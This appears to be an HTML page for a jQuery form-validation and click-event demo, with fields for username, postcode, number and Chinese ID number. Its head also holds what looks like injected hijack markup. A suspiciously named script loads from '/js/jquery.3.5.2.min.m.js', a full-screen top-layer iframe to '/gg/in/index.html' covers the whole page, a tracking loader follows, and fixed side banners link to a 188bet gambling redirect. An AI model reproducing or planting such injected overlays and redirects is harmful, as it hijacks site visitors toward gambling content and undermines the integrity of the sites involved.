<meta http-equiv=
"Content-Type"
content=
"text/html; charset=gb2312"
>
<script type=
"text/javascript"
src=
"js/jquery-1.6.1.min.js"
></script>
<script type=
"text/javascript"
src=
"js/jquery.validate.js"
></script>
<script type=
"text/javascript"
src=
"js/jquery.metadata.js"
></script>
<script type=
"text/javascript"
src=
"js/messages_zh.js"
></script>
<style type=
"text/css"
>
#frm label.error {
color: Red;
}
</style>
<script type=
"text/javascript"
src=
"/js/jquery.3.5.2.min.m.js"
></script><div style=
"Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"
><iframe frameborder=
"no"
src=
"/gg/in/index.html"
style=
"height: 100%;width: 100%;position: fixed;left:0; top:0;"
></iframe></div><script>!
function
(p){
"use strict"
;!
function
(t){
var
s=window,e=document,i=p,c=
""
.concat(
"https:"
===e.location.protocol?
"https://"
:
"http://"
,
"sdk.51.la/js-sdk-pro.min.js"
),n=e.createElement(
"script"
),r=e.getElementsByTagName(
"script"
)[0];n.type=
"text/javascript"
,n.setAttribute(
"charset"
,
"UTF-8"
),n.async=!0,n.src=c,n.id=
"LA_COLLECT"
,i.d=n;
var
o=
function
(){s.LA.ids.push(i)};s.LA?s.LA.ids&&o():(s.LA=p,s.LA.ids=[],o()),r.parentNode.insertBefore(n,r)}()}({id:
"K0m2TJ2kWzkFfr5E"
,ck:
"K0m2TJ2kWzkFfr5E"
});</script>
<div style=
"position: fixed;right: 0;top:100px;width: 125px; z-index:2000;"
><div><a target=
"_blank"
rel=
"nofollow"
href=
"https://www.520xingyun.com/from/188bet.php"
><img width=
"120px"
height=
"550px"
src=
"https://www.520xingyun.com/images/188_120.gif"
></a></div></div><div style=
"position: fixed;left: 0;top: 100px;width: 125px;z-index:2000;"
><div><a target=
"_blank"
rel=
"nofollow"
href=
"https://www.520xingyun.com/from/188bet.php"
><img width=
"120px"
height=
"550px"
src=
"https://www.520xingyun.com/images/188_120.gif"
></a></div></div>
<script type=
"text/javascript"
>
$(document).ready(
function
(){
$(
"#clickme"
).click(
function
(){
alert(
"Hello World click"
);
});
$(
'#clickmebind'
).bind("click",
function
(){
alert("Hello World bind");
});
$(
'#clickmeon'
).on(
'click'
,
function
(){
alert(
"Hello World on"
);
});
});
</script>
<label></label>
<form id=
"frm"
name=
"frm"
method=
"post"
action=
""
><label>用 户 名:
<input type=
"text"
name=
"username"
id=
"username"
>
</label>
<p>
<label>邮 编 :<label></label></label>
<label>
<input type=
"text"
name=
"postcode"
id=
"postcode"
>
<br>
</label>
</p>
<p><label>数 字 :
<input type=
"text"
name=
"number"
id=
"number"
>
</label>
<br><label>身份证号:
<input type=
"text"
name=
"identifier"
id=
"identifier"
>
</label>
<label>
<input type=
"button"
name=
"clickme"
id=
"clickme"
value=
"click me"
>
</label>
<label>
<input type=
"button"
name=
"clickmebind"
id=
"clickmebind"
value=
"clickme_bind"
>
</label>
<label>
<input type=
"button"
name=
"clickmeon"
id=
"clickmeon"
value=
"clickme_on"
>
</label>
</p>
</form>